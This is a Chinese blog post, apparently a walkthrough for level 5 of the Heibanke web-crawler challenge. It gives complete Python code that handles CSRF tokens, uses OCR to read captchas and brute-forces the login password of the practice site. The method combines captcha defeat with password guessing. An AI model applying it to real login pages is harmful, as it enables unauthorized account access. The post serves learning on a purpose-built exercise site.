黑板客 -- 爬蟲闖關 -- 關卡05
阿新 • • 發佈:2018-10-01
ref time pos download 模塊 pytho awl post dde
簡介
爬蟲闖關鏈接:
1. ?http://www.heibanke.com/accounts/login/?next=/lesson/crawler_ex04/
2.? http://www.heibanke.com/lesson/crawler_ex04/
3.? http://www.heibanke.com
知識點:cookie & session , csrf , Web編程,驗證碼識別模塊
提示:本題相較之於前4題的難度在於驗證碼識別問題,為了方便起見,就用了網絡上現成的pytesser模塊,PIL模塊64位Python安裝時可能會遇到一點小麻煩,盡量使用32位Python。
pytesser模塊安裝及使用參考資料:
1. http://blog.csdn.net/evankaka/article/details/49533493
2. http://blog.csdn.net/tianxiawuzhei/article/details/44922843
3. http://blog.csdn.net/bigzhao_25/article/details/52350781
參考代碼
#!/usr/bin/env python # encoding: utf-8 import requests import sys import re import threading from pytesser import * reload(sys) sys.setdefaultencoding("utf-8") csrf = "" username = "Peter" password = "112233" captcha_0 = "" captcha_1 = "" attack_password = "" website_login = "http://www.heibanke.com/accounts/login/?next=/lesson/crawler_ex04/" website_attack = "http://www.heibanke.com/lesson/crawler_ex04/" website_imageBase = "http://www.heibanke.com" payload_login = { "username":username, "password":password, "csrfmiddlewaretoken":csrf } payload_attack = { "username":username, "password":attack_password, "csrfmiddlewaretoken":csrf, "captcha_0":captcha_0, "captcha_1":captcha_1 } s = requests.Session() s.get(website_login) csrf = payload_login["csrfmiddlewaretoken"] = payload_attack["csrfmiddlewaretoken"] = s.cookies["csrftoken"] def Test_verCode(image_path): image = Image.open(image_path) verCode_res = image_to_string(image) return verCode_res def getVerCode(resp): global payload_attack word_captcha_1 = re.findall('<img src="(.*?)" alt="captcha" class="captcha" />', resp.content) word_captcha_0 = re.findall('<input id="id_captcha_0" name="captcha_0" type="hidden" value="(.*?)" />', resp.content) payload_attack["captcha_0"] = word_captcha_0[0] Image_URL = website_imageBase+word_captcha_1[0] return Image_URL def downloadImage(Image_URL): try: pic= requests.get(Image_URL, timeout=10) except requests.exceptions.ConnectionError: print '[-] Image can not download ' string = '1' + '.png' fp = open(string,'wb') fp.write(pic.content) fp.close() def get_attackResp(verCode_res,attack_password,s): global payload_attack payload_attack["password"] = attack_password payload_attack["captcha_1"] = verCode_res[0:4:1] resp_attack = s.post(website_attack,data=payload_attack) payload_login["csrfmiddlewaretoken"] = s.cookies["csrftoken"] payload_attack["csrfmiddlewaretoken"] = s.cookies["csrftoken"] return resp_attack def main(): global payload_login global payload_attack global s resp_login = s.post(website_login,data=payload_login) payload_login["csrfmiddlewaretoken"] = s.cookies["csrftoken"] payload_attack["csrfmiddlewaretoken"] = s.cookies["csrftoken"] image_URL = getVerCode(resp_login) downloadImage(image_URL) verCode_res = Test_verCode('1.png') for i in range(31): resp_attack = get_attackResp(verCode_res,str(i),s) while True: if resp_attack.content.find(u'驗證碼輸入錯誤'.decode('utf8')) == -1: break else: print "[-]VerCode ERROR: PW:" + payload_attack["password"] + " -- VERCODE:" + verCode_res resp_login = s.post(website_login,data=payload_login) payload_login["csrfmiddlewaretoken"] = s.cookies["csrftoken"] payload_attack["csrfmiddlewaretoken"] = s.cookies["csrftoken"] image_URL = getVerCode(resp_login) downloadImage(image_URL) verCode_res = Test_verCode('1.png') resp_attack = get_attackResp(verCode_res,str(i),s) continue if resp_attack.content.find(u'錯誤'.decode('utf8')) == -1: print "[+]FOUND PASSWORD:" + payload_attack["password"] print "\nTEXT:\n" + unicode(resp_attack.content).decode('utf8') break if __name__ == '__main__': main()
黑板客 -- 爬蟲闖關 -- 關卡05